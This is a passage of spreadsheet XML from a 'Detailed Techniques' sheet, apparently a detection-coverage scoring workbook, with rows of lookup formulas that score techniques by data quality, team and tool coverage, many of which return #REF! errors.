      <c r="J163" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K163" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L163" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M163" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N163" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O163" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P163" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q163" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R163" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S163" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T163" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U163" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V163" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W163" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X163" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y163" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="164" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A164" s="8" t="s">
        <v>200</v>
      </c>
      <c r="B164" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C164" s="25" t="s">
        <v>917</v>
      </c>
      <c r="D164" s="10" t="s">
        <v>918</v>
      </c>
      <c r="E164" s="10" t="s">
        <v>919</v>
      </c>
      <c r="F164" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G164" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K164,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H164" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I164" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J164" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K164" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L164" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M164" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N164" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O164" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P164" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q164" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R164" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S164" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T164" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U164" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V164" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W164" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X164" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F164&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F164))-LEN(SUBSTITUTE(TRIM(F164),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y164" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="165" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A165" s="8" t="s">
        <v>209</v>
      </c>
      <c r="B165" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C165" s="25" t="s">
        <v>920</v>
      </c>
      <c r="D165" s="10" t="s">
        <v>921</v>
      </c>
      <c r="E165" s="10" t="s">
        <v>922</v>
      </c>
      <c r="F165" s="10" t="s">
        <v>676</v>
      </c>
      <c r="G165" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K165,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H165" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I165" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J165" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K165" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L165" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M165" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N165" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O165" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P165" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q165" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R165" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S165" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T165" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U165" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V165" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W165" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X165" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F165&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F165))-LEN(SUBSTITUTE(TRIM(F165),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y165" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="166" spans="1:25" ht="213.75" x14ac:dyDescent="0.45">
      <c r="A166" s="8" t="s">
        <v>162</v>
      </c>
      <c r="B166" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C166" s="25" t="s">
        <v>923</v>
      </c>
      <c r="D166" s="10" t="s">
        <v>924</v>
      </c>
      <c r="E166" s="10" t="s">
        <v>925</v>
      </c>
      <c r="F166" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G166" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K166,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H166" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I166" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J166" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K166" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L166" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M166" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N166" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O166" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P166" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q166" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R166" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S166" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T166" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U166" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V166" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W166" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X166" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F166&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F166))-LEN(SUBSTITUTE(TRIM(F166),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y166" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="167" spans="1:25" ht="178.5" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A167" s="8" t="s">
        <v>155</v>
      </c>
      <c r="B167" s="8" t="s">
        <v>1</v>
      </c>
      <c r="C167" s="25" t="s">
        <v>926</v>
      </c>
      <c r="D167" s="10" t="s">
        <v>927</v>
      </c>
      <c r="E167" s="10" t="s">
        <v>928</v>
      </c>
      <c r="F167" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G167" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K167,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H167" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I167" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J167" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K167" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L167" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M167" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N167" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O167" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P167" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q167" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R167" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S167" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T167" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U167" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V167" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W167" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X167" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F167&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F167))-LEN(SUBSTITUTE(TRIM(F167),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y167" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="168" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A168" s="8" t="s">
        <v>121</v>
      </c>
      <c r="B168" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C168" s="25" t="s">
        <v>929</v>
      </c>
      <c r="D168" s="10" t="s">
        <v>930</v>
      </c>
      <c r="E168" s="10"/>
      <c r="F168" s="10" t="s">
        <v>931</v>
      </c>
      <c r="G168" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K168,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H168" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I168" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J168" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K168" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L168" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M168" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N168" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O168" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P168" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q168" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R168" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S168" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T168" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U168" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V168" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W168" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X168" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F168&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F168))-LEN(SUBSTITUTE(TRIM(F168),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y168" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
